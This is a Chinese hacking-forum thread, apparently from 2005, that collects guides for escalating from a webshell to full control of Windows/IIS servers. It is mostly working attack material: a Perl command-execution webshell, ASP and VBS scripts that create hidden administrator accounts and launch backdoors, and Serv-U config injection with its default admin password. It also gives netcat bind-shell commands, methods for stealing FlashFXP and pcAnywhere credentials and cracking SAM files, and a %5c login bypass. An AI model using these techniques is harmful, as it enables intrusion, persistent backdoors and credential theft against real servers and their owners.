 43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe -v -l 3333 -r 43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了 

18.SQL帐户密码泄露 

 如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。 

 引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了 

19.asp.dll 

 引用:因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同) 
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll" 
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\\Inetpub\\AdminScripts>这个目录下. 
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东. 

20.Magic Winmail 

 前提是你要有个webshell 引用:_blank>http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧 

21.DBO…… 
 
 其实 提升权限的方式很多的 就看大家怎么利用了 HOHO加油吧 将服务器控制到底!


[此贴子已经被作者于2005-6-23 23:29:59编辑过]
--------------------------------------------------------------------------------

-- 作者:右边草
-- 发布时间:2005-6-21 8:28:38

-- 
这是什么? 
--------------------------------------------------------------------------------

-- 作者:lobo
-- 发布时间:2005-6-23 23:30:14

-- 

转自http://blog.hackbase.com/cat
提升权限终极技巧
作者:黑狼

个人总结如下:
1: C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\
3.C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\
如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access1=d:\\|RWAMELCDP
Access1=f:\\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\\winnt\\system32\\inetsrv\\data\
5.看能否跳转到如下目录
c:\\php, 用phpspy
c:\\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\\r\\n\\r\\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\\r\\n", 13);
open(STDERR, ">&STDOUT") || die "Can\'t redirect STDERR";
system($execthis);
syswrite(STDOUT, "\\r\\n</PRE></HTML>\\r\\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 _blank>http://anyhost//cmd.pl?dir 
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe 
返回: 
Serv-u >3.x Local Exploit by xiaolu 

USAGE: serv-u.exe "command" 

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 
现在是 IUSR 权限,提交: 
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F" 
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F" 
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F" 
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F" 
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员: 

_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe " net l ... s IUSR_anyhost /add" 


6.可以成功运行"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user","an85$") 
od.SetPassword "an85" <-----密码
od.SetInfo 
Set of=GetObject(oz&"/an85$,user") 
oe.Add(of.ADsPath) 
Response.write "一个超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next \'查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\\Program Files\\Java Web Start\\
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。

9.最后了,如果主机设置很变态,可以试下在c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动"写入bat,vbs等木马。

等到主机重启或者你ddos逼它重启,来达到权限提升的目的。


总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"

以上是本人的拙见,大家有什么好的方法多多分享 


通过webshell获得admin全攻略 话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
****************************************************************************
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,那么就会用到ftp,服务
器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~



好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。



用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip 
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id               //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password                 //密码
230 User logged in, proceed.
ftp> cd winnt                   //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32                   //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。



如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("cmd.exe /c net user kevi kevi /add",0) 
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)



存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
****************************************************************************
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件,
比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序,
绑定一个批处理或者VBS,然后还是等待服务器重启。
****************************************************************************
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
****************************************************************************
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件。然后会发现
打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦~~嘻嘻~



唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp星号密码
查看器查看,然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示,
然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦~~
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
****************************************************************************
第五



WIN2K+IIS5.0默认情况下应用程序保护选项是"中(共用的)",这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,
以SYSTEM权限加载的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll



所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test
%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的
远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个
"/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限
漏洞,这种漏洞很多别的地方( php、asp等)也还存在。



加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
一般默认情况下是:
1、 idq.dll         d:\winnt\system32\idq.dll
2、 httpext.dll       d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll     d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll       d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll       d:\winnt\system32\msw3prt.dll
6、 author.dll       D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll       D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll       D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
9、 sspifilt.dll     d:\winnt\system32\inetsrv\sspifilt.dll
10、compfilt.dll     d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll       d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll       d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll     D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll



正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了



可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。
然后等待IIS重启加载此dll,就可以获得权限了
****************************************************************************
第六



下载系统的 %windir%\repair\sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然后用L0pht等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
****************************************************************************
第七
PipeUpAdmin(Windows 2000下), 在本机运行可以把当前用户帐号加入管理员组。普通用户
和Guests组用户都可以成功运行。
****************************************************************************
第八
Serv-u Ftp Server 本地权限提升漏洞:
很多主机的C:\Documents and Settings\All Users\ Documents目录以
及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并
运行Exp.
直接上传了serv-u local exploit 和nc,
并且把serv-u的本地提升权限的名字命名为su.exe 
文件就放在C:\Documents and Settings\All Users\ Documents,
然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令:
建立用户: serv-u.exe "cmd" 
>USER xl
>PASS 111111



反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"



WEBSHELL权限提升 

动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL         
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator 密码:#l@$ak#.lk;0@P   (密码都是字母) 
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具

auto.ini 加 SHELL.VBS

autorun.inf
[autorun] 
open=shell.vbs
shell.vbs
dim wsh 
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序

Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名"> 
</OBJECT> 
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上


replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式 
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 

[/R] [/W] 
REPLACE [drive1:][path1]filename [drive2:][path2] 



[/R] [/S] [/W] 



 [drive1:][path1]filename 指定源文件。 
 [drive2:][path2] 指定要替换文件的 
              目录。 
 /A 把新文件加入目标目录。不能和 
              /S 或 /U 命令行开关搭配使用。 
 /P 替换文件或加入源文件之前会先提示您 
              进行确认。 
 /R 替换只读文件以及未受保护的 
              文件。 
 /S 替换目标目录中所有子目录的文件。 
              不能与 /A 命令选项 
              搭配使用。 
 /W 等您插入磁盘以后再运行。 
 /U 只会替换或更新比源文件日期早的文件。 
              不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下

脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts"
A.BAT的内容可以是NET USER yonghu mima 
也可以是NET USER ADMINistrator XXX 
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限

SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换


使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。
其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。
其三,通过替换系统服务来提升。
其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:) 
本人在www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够 黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版 本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输入www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing
图1
于是上传了一个asp的脚本的后门,怎么提升权限呢?
在这个网站的主机上游荡了N分钟,在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!
又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。
我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。 <!-- Message body ''"" --> 

将asp权限提到最高by: cnqing from:http://friend.91eb.com 
本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。 
原理: 
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system 
方法: 
第一步。 
得到inprocesslsapiapps内容,用命令"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。 
第二步 
写一个bat内容为"cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" ····· 
省略号为复制下的内容。中间用空格分开不要带回车符 
最后运行这个bat就行了。 
例如: 
我用"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"得到 
"c:\winnt\system32\inetsrv\httpext.dll" 
"c:\winnt\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" 
"C:\WINNT\System32\msw3prt.dll" 
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll" 
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll" 
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll" 


那么你的bat就应该是: 

cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll" 


已测试成功!! 

利用%5c绕过验证 

利用%5c绕过验证

---------------------------------------
lake2(http://mrhupo.126.com
2004-11-27
---------------------------------------

说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。

好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是\的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。

后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。

一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。

废话少说,看下面的代码:

<!--#INCLUDE file="conn.asp" -->
<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.CreateObject("ADODB.Recordset")
sql="select * from admin where id=1" 
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "请输入正确地管理员密码!"
response.end
else
session("admin")=1 '登陆后写入seesion中保存
response.write("登陆成功,请返回信息页")
end if
%>


看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:

<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>

啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!

知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。

诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。

既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的"洞"网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:

If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
End If

数据库找不到程序就结束了,呵呵,空欢喜一场。

接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。

我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。

总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录

至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^


提升权限终极技巧 作者:WekweN http://www.wrsky.com

本篇文章结合了许多高手提升权限的技巧和自己的一些想法

当我们取得一个webshell时候,下一部要做的就是提升权限

个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
ps: 破解工具本站已提供。请自己Search一下!

2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside

3.C:\Documents and Settings\All Users\「开始」菜单\程序看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限


4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir 
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c\perl\bin\su.exe 
返回: 
Serv-u >3.x Local Exploit by xiaolu 

USAGE: serv-u.exe "command" 

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 
现在是 IUSR 权限,提交: 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F" 
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu 

<220 Serv-U FTP Server v5.2 for WinSock ready... 

>USER LocalAdministrator 

<331 User name okay, need password. 

****************************************************** 

>PASS #l@$ak#.lk;0@P 

<230 User logged in, proceed. 

****************************************************** 

>SITE MAINTENANCE 

****************************************************** 

[+] Creating New Domain... 

<200-DomainID=2 

<220 Domain settings saved 

****************************************************** 

[+] Domain xl:2 created 

[+] Creating Evil User 

<200-User=xl 

200 User settings saved 

****************************************************** 

[+] Now Exploiting... 

>USER xl 

